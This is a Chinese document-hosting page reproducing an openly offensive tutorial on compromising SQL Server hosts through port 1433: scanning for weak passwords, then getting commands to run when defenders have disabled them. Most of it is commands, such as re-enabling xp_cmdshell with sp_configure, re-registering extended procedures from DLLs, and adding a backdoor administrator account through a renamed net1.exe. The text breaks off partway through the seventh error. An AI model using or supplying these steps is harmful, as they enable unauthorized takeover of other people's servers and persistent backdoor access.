1433SQL-TOOL执行命令错误修复大全.docVIP

  1. 1、本文档共10页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
选自:华夏彩客网() 1433端口是SQL数据库端口,当一台服务器的SQL数据库存在弱口令就很容易被黑客攻击 现在比较流行的1433抓鸡,1433抓服务器就是利用这个原理。 黑客一般先利用端口扫描工具批量扫描ip,找到打开1433端口的主机(一般只有作为服务器使用的主机才会打开1433端口),再利用X-SCAN或者其他工具过滤出存在SQL弱口令的主机来 然后用SQL TOOLS连接主机,进行SQL或者CMD命令执行,从而 得主机的控制权,但是服务器的管理人员通常会把一些不安全的漏洞补上,所以用sql tools直接执行命令成功的几率不大,会出现很多种错误,这时就需要用到sql查询分离器来执行命令 下面我就把一些常见的错误及修复方法列出来: 下面提及的命令都是通过sql查询分离器执行的! 错误一:Error Message:未能找到存储过程 master..xp_cmdshell。 修复方法: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc xp_cmdshell 服务器: 消息 3701,级别 11,状态 5,行 1 第二步恢复: dbcc addextendedproc (sp_oacreate,odsole70.dll) dbcc addextendedproc (xp_cmdshell,xplog70.dll) 错误二:拒绝访问 修复方法: 一般管理会把net.exe禁用或者改名,Net1是和net效果一样的 sql tools执行DOS?? dir net1.exe /s /p? (有哪些信誉好的足球投注网站net1.exe的位置) 一般结果显示在?C:\WINDOWS\system32\dllcache 的目录 我们利用这个目录的net1执行cmd命令 C:\WINDOWS\system32\dllcache\net1.exe user 123 123 /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators 123 /add 提权成功 ? 错误三:Error Message:SQL Server 阻止了对组件 xp_cmdshell 的 过程 sys.xp_cmdshell 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 xp_cmdshell。有关启用 xp_cmdshell 的详细信息,请参阅 SQL Server 联机丛书中的 外围应用配置器。 修复方法: EXEC sp_configure show advanced options, 1 -- RECONFIGURE WITH OVERRIDE -- EXEC sp_configure xp_cmdshell, 1 -- RECONFIGURE WITH OVERRIDE -- EXEC sp_configure?? show advanced options, 0 -- 错误四:无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc xp_cmdshell 第二步执行:sp_addextendedproc xp_cmdshell, xpsql70.dll 错误五:无法装载 DLL xpweb70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 修复方法: 第一步 exec sp_dropextendedproc xp_cmdshell 第二步 dbcc addextendedproc (xp_cmdshell,c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll) ;EXEC sp_configure?? show advanced options, 0 -- 错误六:无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc xp_cmdshell 第二步执行:exec sp_addextendedproc xp_cmdshell,xpweb70.dll?? 错误七:xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行) 前提是cmd.exe 和odsole70.dll存在 然后利用以下SQL语句

文档评论(0)

185****7617 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档